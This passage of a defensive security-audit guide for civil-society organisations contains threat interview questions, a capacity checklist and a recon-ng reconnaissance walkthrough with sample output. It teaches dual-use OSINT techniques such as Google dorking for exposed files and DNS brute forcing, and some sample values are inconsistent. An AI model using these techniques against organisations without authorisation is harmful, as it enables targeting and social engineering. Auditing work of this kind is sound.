  • Robbery?
  • Kidnapping?
  • Harrasment?
  • Surveillance?
  • Physical violence?

Questions for Known High Risk Organizations

See Guiding Questions for High Risk Organizations if there are concerns that the organization may be targeted by advanced threat actors.

Guiding Questions for High-Risk Organisations

Summary

This additional interview activity is to identify if there are any indicators that the organization may have already been attacked and/or compromised, or if someone they know has faced advanced threats. It should help identify what threats / threat actors they are dealing with, and their intent. This will help the auditor prioritize work with the organisation during the audit and follow up and understand whether the auditor has the expertise to address or understand the threat or if outside expertise is needed.

Overview

• This exercise should be conducted if the Context Research, initial interview process, or other warning signs indicate that the organization may be facing targeted digital attacks.
• Conduct surveys, internviews, or discussions with individuals and with the organiztion staff a group. Depending on the sensitivity, you may find it easier to conduct these more informally throughout the audit duration. See Considerations for further discussion.
• Review findings and potentially repeat or follow up on specific incidents with different staff members
• Remember that the role of Tte auditor is not to fix or investigate the issue, but to collect data and pull out insights that will shape the audit.
• Be aware of time and don't spend too much time on explaining what advanced threats are
• Before starting the interview process, read about known or common attacks you can reference (DDoS attacks, malware, phishing, ransomware, etc.) to remind staff and get the conversation started. In order for the stories to be compelling, they should be localised and the threats should reflect common challenges in their line of work. Much of this can come from your technical context research work.

Materials Needed

~45 minutes per interview / staff member 1 hr interview as an org, depending on organisational culture

Considerations

Operational Security

• In case you do an interview online, the data needs to be protected (end to end encryption, tor, vpns, etc)
• Get the consent of the participant to speak with them over that channel, or add details about the VOIP application and privacy information to the agreement
• Might consider not having the conversation in the office, but somewhere trusted
• Might want to leave devices outside of the room

Psychological Considerations

• Ask the staff to keep the stories generalised, not personalised during the organisation interview
• Staff might be embarrassed talk an incident about in front of the entire org
• Staff might exaggerate or overestimate attacks due to lack of understanding of the attack and impact
• Staff might underestimate attacks due to overexposure to these hacks, other pressing challenges, or lack of understanding
• Auditors should listen and explain concepts, but don't argue about the "seriousness" of the incident
• Don't correct the staff member if they describe the incident incorrectly
• Tread carefully, given the topic can be triggering or difficult and this is an early stage of the audit

Walkthrough

Individual Interview

• Have you encountered suspicious messages, emails, etc. in the course of your work or personal life?
• If "No" or "I don't know", the auditor should give an example of what an suspicious message might look like.
• If "yes", ask these questions for each suspicious event:
  • Can you tell me about the suspicious message? What made you feel it was suspicious?
  • What did you do when you received it? (i.e. who did you contact? did you click on it or download a file? did you follow the instructions?)
  • Do you feel you are compromised now? How does this impact you?
  • Can you share this message? (Link to guides to share messages with sender, content, timestamp)
  • Have you received any account notifications? Such as SMS or emails notifying you of unauthorized access to your account (email, social media), an account being locked, suspicious activity on your account?

• Has this happened to colleagues, peer organisations, community members, CSO actors journos, that you know?

• Have you ever experienced an incident or hack during the course of your work? If the answer is "yes", ask these questions for each attack
  • Can you tell me about that event/incident/hack? (i.e. who was involved, when it happened, what happened, was it personal or work-related? what were the consequences? (financial, physical, emotional, reputational))
  • What did you do after? Who do you ask for help from?
  • Do you have something that you can show us? (i.e. an email, screenshots, social network messages, the actual infected machine, message from the attacker, social network pages made by attackers, leaked information)
  • Do you feel you are compromised now? How does this impact you?

• Has this happened to colleagues, peer organisations, community members, CSO actors (journos, etc)? (Revisit above questions to the extent the interviewee can provide detail)

• Why do you think you are targeted?

• What would you like to get out of this audit?

Group Interview

NOTE: Remind the staff that if it's not public within the organisation and/or happened to a personal account, then don't share it during this session.

• Have you been hacked before (as an organisation)?
• If the answer is "No" or "I don't know", the auditor should give an example of what an attack might look like. If they still say no, then move on to other questions for the risk assessment:
  • DDoS attack
  • Website defacement
  • Spam and adverstisements
  • Malware
  • Attachment that doesn't work
  • Attachment that AV doesn't like
  • Attachment from unknown person or unexpected email
  • Phishing
  • Gmail Reset Password Notifications
  • Blackmail - Electronic Threats
  • Ransomware If the answer is "yes"
  • Can you tell me about that event/incident/hack?(i.e. who was involved, when it happened, what happened, was it personal or work-related? what were the consequences? (financial, physical, emotional, reputational))

• What did you do after? Who do you ask for help from?

• Do you have something that you can show us? (i.e. an email, screenshots, social network messages, the actual infected machine, message from the attacker, social network pages made by attackers, leaked information)

• Do you feel you feel targeted as an organisation? How does this impact your operations?

• Why do you think you are targeted?

• Do you know who was behind the attack?

• Has this happened to colleagues, peer organisations, community members, CSO actors (journos, etc)? (Add actors based on context research)

NOTE: Repeat above questions per incident

• Do you have a sense of your adversaries or those who seek to disrupt your work? Are aware of their capabilities? (i.e. Are they well funded? Do they have advanced technical expertise? Are they government backed?)

• What is their motivation for attacking you or any other peer org in the community?

• What is your motivation for having the audit?

NOTE: Could lead to further conversations about what data they have, what assets are the most important, sensitive and possibly targeted

Recommendation

Recommendations will depend on the advanced threats raised during the interview. See the Advanced Threat method for details.

Capacity Assessment Checklist

Summary

A monolithic, one-time interview with key staff is not always possible or advisable, but interacting with a variety of staff exposes valuable information about every aspect of the audit, from vulnerabilities to capacity to hidden barriers. This serves as a "cheat sheet" of some topics to explore both during the planning and preparation phase and throughout the audit process.

Walkthrough

"Homework"

• Basic contact and organizational information: name, org, org's stated mission
• Contextual research

Organizational

• Size of staff
• Key roles in org for tech and management
• Structure: Management and Technical?
• (Program size, activities, information)
• (Change management)
• Languages used in office

Contextual / Background / Threat information

• What (if any) threats have occured to the organization and its partners? (digital, physical)
• Surveillance?
• What other threats are you concerned about? What has happened to other organizations in the space?
• Org responses to these threats - trainings, technical responses, organization process/change successes?
• Specific programs or other work outside of publicly stated mission that are high-risk
• Program use of technology (SMS surveys, blogs, facebook pages, other websites, media recording and broadcast ...?)

Technical

• Primary website
• Additional websites
• Website technologies (content management, hosting provider)
• Technology in use:
• Desktop software (OS, Office)
• Desktop security tools (anti-virus, anti-malware, firewalls, vpns, disk encryption...)
• Servers (email, shared file system, networking tools, backups)
• Email, email hosts
• Other communication tools - skype, facebook, chat, mobile...
• Other less formal tools - external emails, dropbox...
• Internal network - wired, wireless, type of wireless network, ISP

Preparation Support

• Infrastructure
• How is the office connected to the Internet?
• Power outages or other challenges?
• Office setup and size
• Shared office space, shared floor or building?
• Physical security of the office?

Practices and behaviors

• Office access and location
• Personal device usage
• Transporation means used to get to and from home
• Remote access to organizational resources (VPN, shared files)

Manual Reconnaissance

Summary

This exercise suggests some targeted online search tools and tricks to gather information leakages from organizations. While many advocacy, activism, and media/journalism focused organizations are very public as part of their operations, the searches suggested here aim to explore data that could be used to better attack or socially engineer an organization.

Overview

• Use advanced search tools of major search engines to discover partners, projects, and other valuable information about the organization.
• Social Media / Account Discovery
• Search pastebin and github style sites for breach and website/software development records
• Use reverse image searching and exif tools on photos of interest
• Use to add additional data in to, and to research further discoveries from, the automated recon work

Materials Needed

Considerations

• Use VPNs or Tor to conduct your searching. Tor may be blocked by some services.
• Some searches may reveal personal information. Be empathetic and responsible with this, even though it is "public" information.

Walkthrough

These custom and more manual approaches work excellently in combination with automated tools such as recon-ng or the commercial Maltego. Working with both these tricks and the automated tools, feeding information learned from one back to the other, is a powerful way to unearth large amounts of information about an organization.

Much of the tools and further guidance is well covered in the references for the Reconnaissance method, a small selection of starting points is mapped out below.

Take care, however, to not waste time on this; using image information tools on every photo on an organization's website, or researching every linked social media account may not provide further valuable information - step back and judge the value of digging deeper - are you finding adversaries? Are you finding information that the organization may not want online? Are there other methods which might be more appropriate to apply?

Search Engines

Google dorking tricks:

• limit to the target webiste using site: and look for potentially accidentally uploaded file types (e.g. xlsx, you can reference this full list of searchable filetypes)
• inurl:
• search for link: to discover partners and projects (add "project of" and similar), removing known, un-interesting and irrelevant sites with -site:
• Browse Exploit-db for interesting and advanced combinations to consider, e.g. inurl:/wp-en/wpbackitup_backups

Social Media / Account Discovery

• Use tools such as KnowEm, namechk, or namechecklist to find similar or organizationally-linked usernames across other social media accounts.

Additional Tools

• GlassDoor can provide insight (mostly for larger organizations) on whether there might be disgruntled former (or current) employees.

Pastebin Searching

• Search pastebin for keywords about the organization (usually their website address) -- this custom google search by IntelTechniques searches across over 100 pastebin-like sites, including github, at once.

Working with Images

• Use tools like tineye and Google Reverse Image search to find images (especially user icons from twitter, etc.) on other sites, and test interesting ones for additional image in the EXIF data using online tools like Exif Viewer or commandline tools like exiftool.

Recommendation

Automated Reconnaisance

Summary

This component allows the auditor to quickly identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Overview

• Passive Reconnaissance
  • Identify availability of staff, partner, beneficiary, and current project information online. ⁴⁰
  • Search "paste-bin" sites for leaked internal information or existing exploitation of their infrastructure.
  • Create API keys for Recon-ng services to be used. ⁴¹
  • Use recon-ng to do automated web-based open source reconnaissance. ⁴²

Materials Needed

Considerations

• Use VPNs to do automated searching. The automated process can be misconstrued by various services as malicious and cause your local network to get blocked, filtered, or surveilled. Tor is often blocked by the tools you will be using.

Walkthrough

Both Recon-ng and Foca are open source reconnaissance tools with many available plugins. Foca is, out-of-the-box, more aimed at extracting metadata from documents and images, whereas Recon is slightly more focused on finding digging into domains, subdomains, contacts, and the more network-level information. Both tools are best used in addition to critical thinking and manual exploration, and require "seed" inputs to get started and careful curation to remove false leads.

Recon-ng

Installing Recon-ng

• Install recon-ng from the git source: git clone https://[email protected]/LaNMaSteR53/recon-ng.git
• cd recon-ng
• Install pip (sudo apt-get install python-pip) and dependencies: pip install -r REQUIREMENTS
• Launch Recon-ng: ./recon-ng

For full instructions, see the Recon-ng Getting Started Instructions

Using Recon-ng

• Read the short Recon-ng Usage Guide

NOTE: This guide is based upon the data flow documentation from the Recon-ng website

• Interface Basics

By pressing tab twice you can use auto-completion.

[recon-ng][default] >
add         exit        load        record      search      show        use
back        help        pdb         reload      set         spool       workspaces
del         keys        query       resource    shell       unset

This works even in commands.

[recon-ng][default] > show
banner           credentials      hosts            locations        options          schema
companies        dashboard        keys             modules          ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         workspaces

Using recon modules

The recon modules are named in a very specific fashion to help the user understand the flow of data inside the tool. Modules use the syntax <methodology step>/<input table>-<output table>/<module>. The inputs are the first part of each module, and the outputs are the second part. The module name itself is the tool used to process the data. So, recon/domains-hosts/brute-hosts takes domain names (websitename.org) as an input, and outputs hostnames (extranet.websitename.org, etc.). If you provide the name of the specific module, recon-ng can figure it out (though tab completion doesn't help) -- for example, use breachalarm works just as well as use recon/contacts-creds/breachalarm

You can also search modules by their inputs or outputs. search domains- displays all modules that take domain names as their input, and search -contacts displays all modules that outputs contact information.

Preparing

Set verboseness on during the guide so that you can see everything that happens. (recommended to begin with)

[recon-ng][default] > set VERBOSE True

• Add API Keys

You can use auto completion to see all the possible keys you can add.

[recon-ng][websitename] > keys add
bing_api           facebook_secret    google_cse         jigsaw_username    pwnedlist_iv       twitter_api
builtwith_api      facebook_username  ipinfodb_api       linkedin_api       pwnedlist_secret   twitter_secret
facebook_api       flickr_api         jigsaw_api         linkedin_secret    shodan_api         virustotal_api
facebook_password  google_api         jigsaw_password    pwnedlist_api      sonar_api

Choose and add a key.

[recon-ng][default] > keys add bing_api TYPE_THE_KEY_VALUE_HERE
[*] Key 'bing_api' added.

You can list keys by using the command keys list Reference the Creating API Keys Section below for quick links to setting up popular APIs.

First steps

NOTE: This walkthrough is using sample data. Results will vary widely depending on the organization you are working with.

• Create a workspace for your recon.

[recon-ng][default] > workspaces add websitename
[recon-ng][websitename] >

• Note that you can also switch workspaces during the recon.

[recon-ng][websitename] > workspaces select default
[recon-ng][default] >
[recon-ng][default] > workspaces select websitename
[recon-ng][websitename] >

• Add known seed information (domains, netblocks, company names, locations, etc.)

Display possible seed information by using auto-completion.

[recon-ng][default] > add
companies        credentials      hosts            locations        ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins

We will only use the organization's name, one domain, two netblocks (that we got by searching for other domains and ping-ing them), and two e-mails of the company we are looking for so we will add those.

First, add the company name.

[recon-ng][websitename] > add companies
company (TEXT): Websitename
description (TEXT):

Next, add the domain.

[recon-ng][default] > add domains websitename.org
[recon-ng][websitename] > show domains

  +--------------------------------+
  | rowid |     domain    | module |
  +--------------------------------+
  | 1     | websitename.org | base   |
  +--------------------------------+

[*] 1 rows returned

Next, add my contacts. we don't know much. But, we will add what we know.

[recon-ng][websitename] > add contacts
first_name (TEXT): Bob
middle_name (TEXT):
last_name (TEXT): Smith
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > add contacts
first_name (TEXT): Carl
middle_name (TEXT):
last_name (TEXT): Johnson
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] >

Finally we will add the ip address of their website.

[recon-ng][websitename] > add netblocks
netblock (TEXT): 174.154.167.69
[recon-ng][websitename] > add netblocks
netblock (TEXT): 96.127.170.121

Here it is in the database.

[recon-ng][websitename][shodan_net] > show netblocks

  +---------------------------------+
  | rowid |    netblock    | module |
  +---------------------------------+
  | 2     | 174.154.167.69 | base   |
  | 3     | 96.127.170.121 | base   |
  +---------------------------------+

Reconnaisance phase (netblocks example)

• Run modules that leverage known netblocks. This exposes other domains and hosts from which domains can be harvested.

First, search for any modules that use netblocks as an input.

recon-ng][websitename] > search netblocks-
[*] Searching for 'netblocks-'...

  Recon
  -----
    recon/netblocks-hosts/reverse_resolve
    recon/netblocks-hosts/shodan_net
    recon/netblocks-ports/census_2012

In the case of recon/netblocks-hosts/shodan_net we can see that the "shodan_net" module is a reconnaissance module that takes in netblocks and produces hosts.

Lets try it out...

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] >

An empty command line can be daunting. If you are ever stuck on what current commands you can use the help command to see the current commands.

[recon-ng][websitename][shodan_net] > help

Commands (type [help|?] <topic>):

add             Adds records to the database
back            Exits the current context
del             Deletes records from the database
exit            Exits the framework
help            Displays this menu
keys            Manages framework API keys
load            Loads selected module
pdb             Starts a Python Debugger session
query           Queries the database
record          Records commands to a resource file
resource        Executes commands from a resource file
run             Runs the module
search          Searches available modules
set             Sets module options
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file
unset           Unsets module options
use             Loads selected module

Use the show info command to learn about the module and see what options are available.

[recon-ng][websitename][shodan_net] > show info

      Name: Shodan Network Enumerator
      Path: modules/recon/netblocks-hosts/shodan_net.py
    Author: Mike Siegel and Tim Tomes (@LaNMaSteR53)

Description:
  Harvests hosts from the Shodanhq.com API by using the 'net' search operator. Updates the 'hosts'
  table with the results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  LIMIT   1              yes       limit number of api requests per input source (0 = unlimited)
  SOURCE  default        yes       source of input (see 'show info' for details)

Source Options:
  default        SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL ORDER BY netblock
  <string>       string representing a single input
  <path>         path to a file containing a list of inputs
  query <sql>    database query returning one column of inputs

[recon-ng][websitename][shodan_net] >

It pulls directly from the netblocks source that we set up. Now, use run to run the module .

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > run

174.154.167.69
[*] Searching Shodan API for: net:174.154.167.69
[*] 174.154.167.69 (vps.websitename.org) - 7706
[*] 174.154.167.69 (vps.websitename.org) - 110
[*] 174.154.167.69 (vps.websitename.org) - 57
[*] 174.154.167.69 (vps.websitename.org) - 22
[*] 174.154.167.69 (vps.websitename.org) - 147
[*] 174.154.167.69 (vps.websitename.org) - 997
[*] 174.154.167.69 (vps.websitename.org) - 70
[*] 174.154.167.69 (vps.websitename.org) - 25

96.127.170.121
[*] Searching Shodan API for: net:96.127.170.121
[*] 96.127.170.121 (vps.websitename.org) - 7706
[*] 96.127.170.121 (vps.websitename.org) - 22
[*] 96.127.170.121 (vps.websitename.org) - 465
[*] 96.127.170.121 (vps.websitename.org) - 997
[*] 96.127.170.121 (vps.websitename.org) - 25
[*] 96.127.170.121 (vps.websitename.org) - 995
[*] 96.127.170.121 (vps.websitename.org) - 57
[*] 96.127.170.121 (vps.websitename.org) - 147
[*] 96.127.170.121 (vps.websitename.org) - 110
[*] 96.127.170.121 (vps.leillc.net) - 7070

SUMMARY
[*] 17 total (2 new) items found.

Since it promised me hosts, we will see what hosts it uncovered.

[recon-ng][websitename][shodan_net] > show hosts

  +---------------------------------------------------------------------------------------------------+
  | rowid |        host       |   ip_address   | region | country | latitude | longitude |   module   |
  +---------------------------------------------------------------------------------------------------+
  | 1     | vps.websitename.org | 174.154.167.69 |      |         |          |           | shodan_net |
  | 2     | vps.websitename.org | 96.127.170.121 |      |         |          |           | shodan_net |
  | 3     | vps.leillc.net    | 96.127.170.121 |        |         |          |           | shodan_net |
  +---------------------------------------------------------------------------------------------------+

[*] 3 rows returned

It seems the website leillc.net is obviously not associated with the company I am doing recon on. Since this module has finished, we will leave it using the back command.

[recon-ng][websitename][shodan_net] > back
[recon-ng][websitename] >

Now we will use the other two netblock- modules. We will show one more and then skip the second.

First we find all the possible modules using tab completion.

[recon-ng][websitename] > use recon/netblocks-
recon/netblocks-hosts/reverse_resolve  recon/netblocks-hosts/shodan_net       recon/netblocks-ports/census_2012
[recon-ng][websitename] > use recon/netblocks-

We are going to use reverse-resolve.

[recon-ng][websitename][census_2012] > use recon/netblocks-hosts/reverse_resolve

But, when we run it we get an error!

[recon-ng][websitename][reverse_resolve] > run
174.154.167.69
[!] Need more than 1 value to unpack.

OPTIONAL: To figure out what was going on, go back and then set DEBUG True to see the underlying error. The debug error message lets us know that we need to use full netmask syntax for netblocks. We will now add new netblocks in the correct format and then delete the old ones.

First we will add them correctly.

[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 177.154.167.69/72
[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 96.127.170.121/72

Now we have double of the same netblocks

[recon-ng][websitename][reverse_resolve] > show netblocks

  +---------------------------------------------+
  | rowid |      netblock     |      module     |
  +---------------------------------------------+
  | 2     | 174.154.167.69    | base            |
  | 4     | 177.154.167.69/72 | reverse_resolve |
  | 3     | 96.127.170.121    | base            |
  | 5     | 96.127.170.121/72 | reverse_resolve |
  +---------------------------------------------+

[*] 4 rows returned

Now that we know their rowid numbers, I can delete them.

[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 2
[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 3

And, re-running the module now works.

[recon-ng][websitename][reverse_resolve] > run

[*] 177.154.167.69 => dsl-177-154-167-69-dyn.prod-infinitum.com.mx
[*] 96.127.170.121 => vps.websitename.org

SUMMARY

[*] 2 total (1 new) items found.

Now, exploring these hosts we realize quickly that most the new hosts on other domains are not associated with the company. Hence, we will remove them.

[recon-ng][websitename] > show hosts

  +-----------------------------------------------------------------------------------------------------------------------------------+
  | rowid |                     host                     |   ip_address   | region | country | latitude | longitude |      module     |
  +-----------------------------------------------------------------------------------------------------------------------------------+
  | 4     | dsl-177-154-167-69-dyn.prod-infinitum.com.mx | 177.154.167.69 |        |         |          |           | reverse_resolve |
  | 1     | vps.websitename.org                          | 174.154.167.69 |        |         |          |           | shodan_net      |
  | 2     | vps.websitename.org                          | 96.127.170.121 |        |         |          |           | shodan_net      |
  | 7     | vps.pineapplebob.net                         | 96.127.170.121 |        |         |          |           | shodan_net      |
  +-----------------------------------------------------------------------------------------------------------------------------------+

[*] 4 rows returned
[recon-ng][websitename] > del hosts
rowid(s) (INT): 4
[recon-ng][websitename] > del hosts
rowid(s) (INT): 7

We skip the last module recon/netblocks-ports/census_2012 since you already get the idea.

• Add new domains gleaned from the results if they have not automatically been added.

Sadly, none of the new domains were actually useful.

• Run modules that conduct DNS brute forcing of TLDs and SLDs against current domains.

Let's find new domains using brute forcing. First we should look for what is available.

[recon-ng][websitename] > search domains-domains
[*] Searching for 'domains-domains'...

  Recon
  -----
    recon/domains-domains/brute_suffix
[recon-ng][websitename] > use recon/domains-domains/brute_suffix

[recon-ng][websitename][brute_suffix] > run

-------------
WEBSITENAME.ORG
-------------
[*] websitename.ac => No record found.
[*] websitename.academy => No record found.
[*] websitename.ad => No record found.
[*] websitename.ae => No record found.
[*] websitename.aero => No record found.
[*] websitename.af => (SOA) websitename.af - Host found!
[*] websitename.ag => No record found.
[*] websitename.ai => No record found.
[*] websitename.al => No record found.
[*] websitename.am => (SOA) websitename.am - Host found!
[*] websitename.an => No record found.
[*] websitename.ao => No record found.
[*] websitename.aq => (SOA) websitename.aq - Host found!
[*] websitename.ar => No record found.
[*] websitename.arpa => No record found.
[*] websitename.as => No record found.
[*] websitename.asia => No record found.
[*] websitename.at => No record found.
[*] websitename.au => No record found.
[*] websitename.aw => (SOA) websitename.aw - Host found!
[*] websitename.ax => No record found.
[*] websitename.az => No record found.
[*] websitename.ba => No record found.
[*] websitename.bb => No record found.
[*] websitename.bd => No record found.
[*] websitename.be => No record found.
[*] websitename.berlin =>  (SOA) websitename.berlin - Host found!
...

This returned quite a few domains. We have removed the middle section

[recon-ng][websitename][brute_suffix] > show domains

  +------------------------------------------+
  | rowid |       domain      |    module    |
  +------------------------------------------+
  | 2     | websitename.af      | brute_suffix |
  | 7     | websitename.am      | brute_suffix |
  | 4     | websitename.asia    | brute_suffix |
  | 5     | websitename.aq      | brute_suffix |
  | 7     | websitename.bg      | brute_suffix |
             ....
             ....
             ....
  | 25    | websitename.net     | brute_suffix |
  | 1     | websitename.org     | base         |
  | 17    | websitename.uz      | brute_suffix |
  +------------------------------------------+

• Have list of domains validated by the client.
• Remove out-of-scope domains with the "del" command or generate a query which only selects the scoped domains as input.

Many out of scope domains had to be removed, but luckily you can specify ranges when you delete.

[recon-ng][websitename][brute_suffix] > del domains
rowid(s) (INT): 72-44

• Run modules that conduct DNS brute forcing of hosts against all domains.

There are a lot of these, so we will only run one since there is little to nothing new to learn here.

[recon-ng][websitename][brute_suffix] > use recon/domains-hosts/baidu_site
[recon-ng][websitename][baidu_site] > run

------------
WEBSITENAME.EU
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.eu
[*] www.websitename.eu
[*] Sleeping to avoid lockout...

------------
WEBSITENAME.FR
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.fr

-------------
WEBSITENAME.ORG
-------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org
[*] www.websitename.org
[*] things.websitename.org
[*] Sleeping to avoid lockout...

----------------
WEBSITENAME.ORG.UK
----------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org.uk

------------
WEBSITENAME.COM
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.com
[*] www.websitename.com
[*] Sleeping to avoid lockout...

-------
SUMMARY
-------
[*] 5 total (2 new) items found.

[recon-ng][websitename][baidu_site] > use recon/domains-hosts/brute_hosts
[recon-ng][websitename][brute_hosts] > run

-------------
WEBSITENAME.ORG
-------------
[*] No Wildcard DNS entry found.
[*] 0.websitename.org => No record found.
[*] 01.websitename.org => No record found.
[*] 02.websitename.org => No record found.
[*] 03.websitename.org => No record found.
[*] 1.websitename.org => No record found.
[*] 10.websitename.org => No record found.
[*] 11.websitename.org => No record found.
[*] 12.websitename.org => No record found.
[*] 13.websitename.org => No record found.
[*] 14.websitename.org => No record found.
[*] 15.websitename.org => No record found.
[*] 16.websitename.org => No record found.
[*] 17.websitename.org => No record found.
[*] 18.websitename.org => No record found.
[*] 19.websitename.org => No record found.
[*] 2.websitename.org => No record found.
[*] 20.websitename.org => No record found.
[*] 3.websitename.org => No record found.
[*] 3com.websitename.org => No record found.
[*] 4.websitename.org => No record found.
[*] 5.websitename.org => No record found.
[*] 6.websitename.org => No record found.
...
...
[*] autodiscover.websitename.org => (CNAME) autodiscover.websitename-mail.org - Host found!
[*] autodiscover.websitename.org => (A) autodiscover.websitename.org - Host found!
[*] autorun.websitename.org => No record found.
[*] av.websitename.org => No record found.
...
...

[recon-ng][websitename] > show hosts

  +------------------------------------------------------------------------------------------------------------------+
  | rowid |               host              |   ip_address   | region | country | latitude | longitude |    module   |
  +------------------------------------------------------------------------------------------------------------------+
  | 8     | autodiscover.websitename-mail.org |                |        |         |          |           | brute_hosts |
  | 9     | autodiscover.websitename.org      |                |        |         |          |           | brute_hosts |
  | 32    | autodiscover.websitename.com       |                |        |         |          |           | brute_hosts |
  | 10    | conference.websitename.org        |                |        |         |          |           | brute_hosts |
  | 12    | beta.websitename.org              |                |        |         |          |           | brute_hosts |
  | 5     | demo.websitename.org            |                |        |         |          |           | baidu_site  |
  | 14    | email.websitename.org             |                |        |         |          |           | brute_hosts |
  | 15    | intranet.websitename.org               |                |        |         |          |           | brute_hosts |
  | 16    | ftp.websitename.org               |                |        |         |          |           | brute_hosts |
  | 37    | ftp.websitename.com                |                |        |         |          |           | brute_hosts |
  | 13    | ftp2.websitename.org              |                |        |         |          |           | brute_hosts |
  | 11    | websitename.github.com            |                |        |         |          |           | brute_hosts |
  | 24    | websitename.org                   |                |        |         |          |           | brute_hosts |
  | 75    | websitename.com                    |                |        |         |          |           | brute_hosts |
  | 18    | localhost.websitename.org         |                |        |         |          |           | brute_hosts |
  | 19    | mail.websitename.org              |                |        |         |          |           | brute_hosts |
  | 36    | mail.websitename.com               |                |        |         |          |           | brute_hosts |
  | 20    | ns1.websitename.org               |                |        |         |          |           | brute_hosts |
  | 27    | temp.websitename.org              |                |        |         |          |           | brute_hosts |
  | 25    | test.websitename.org              |                |        |         |          |           | brute_hosts |
  | 1     | vps.websitename.org               | 174.174.177.77 |        |         |          |           | shodan_net  |
  | 2     | vps.websitename.org               | 77.127.170.121 |        |         |          |           | shodan_net  |
  | 27    | webmail.websitename.com            |                |        |         |          |           | brute_hosts |
  | 4     | www.websitename.org               |                |        |         |          |           | baidu_site  |
  | 7     | www.websitename.com                |                |        |         |          |           | baidu_site  |
  +------------------------------------------------------------------------------------------------------------------+

[*] 77 rows returned

• Run host gathering modules.

NOTE: Many host gathering modules use other hosts as a starting place. It is important to sanitize the hosts database between modules to make sure that you do start enumerating based upon incorrectly added hosts.

• Resolve IP addresses.
• Run vhost enumeration modules.
• Run port scan data harvesting modules.
• Use JOIN queries for data analysis.

[recon-ng][websitename][census_2012] > query select hosts.ip_address, hosts.host, ports.host, ports.port from hosts join ports using (ip_address)

  +----------------------------------------------------------------------+
  |   ip_address   |           host           |        host       | port |
  +----------------------------------------------------------------------+
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 110  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 147  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 22   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 27   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 477  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 77   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 110  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 147  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 22   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 27   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 7707 |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 477  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 77   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 110  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 147  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 22   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 27   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 7707 |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 77   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 70   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 777  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 110  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 147  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 22   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 27   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 7707 |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 77   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 70   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 777  |
  +----------------------------------------------------------------------+

Reconnaisance: Next Steps

• Run vulnerability harvesting modules.
• Run contact harvesting modules.
